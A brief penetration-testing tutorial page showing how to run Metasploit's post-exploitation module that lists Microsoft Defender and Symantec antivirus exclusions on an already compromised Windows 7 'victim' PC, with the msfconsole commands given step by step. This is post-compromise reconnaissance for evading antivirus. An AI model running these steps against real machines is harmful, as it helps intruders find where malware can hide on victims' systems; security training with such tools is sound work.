Categories

Archives

Kali Linux, Penetration Testing

How to Gather Information of Antivirus in Remote Victim PC using Metasploit

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

 This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/gather/enum_av_excluded

msf exploit (enum_av_excluded)>set lhost 192.168.0.105 (IP of Local Host)

msf exploit (enum_av_excluded)>set session 1

msf exploit (enum_av_excluded)>exploit